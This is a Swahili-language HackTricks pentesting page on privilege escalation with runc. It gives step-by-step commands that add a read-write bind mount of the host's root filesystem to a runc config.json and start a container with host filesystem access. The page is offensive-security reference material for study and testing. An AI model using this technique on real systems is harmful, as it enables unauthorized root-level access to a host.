Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

RunC Privilege Escalation

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Taarifa Msingi

Ikiwa unataka kujifunza zaidi kuhusu runc angalia ukurasa ufuatao:

page2375, 2376 Pentesting Docker

PE

Ikiwa utagundua kuwa runc imewekwa kwenye mwenyeji, huenda uweze kupandisha chombo kwa kufunga saraka ya mizizi / ya mwenyeji.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

Hii haitafanya kazi kila wakati kwani uendeshaji wa msingi wa runc ni kukimbia kama root, kwa hivyo kuendesha kama mtumiaji asiye na mamlaka hawezi kufanya kazi (isipokuwa una usanidi usio na mizizi). Kufanya usanidi usio na mizizi kuwa wa msingi sio wazo nzuri kwa ujumla kwa sababu kuna vizuizi vingi ndani ya kontena zisizo na mizizi ambavyo havitumiki nje ya kontena zisizo na mizizi.

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

PreviousPayloads to executeNextSELinux

Last updated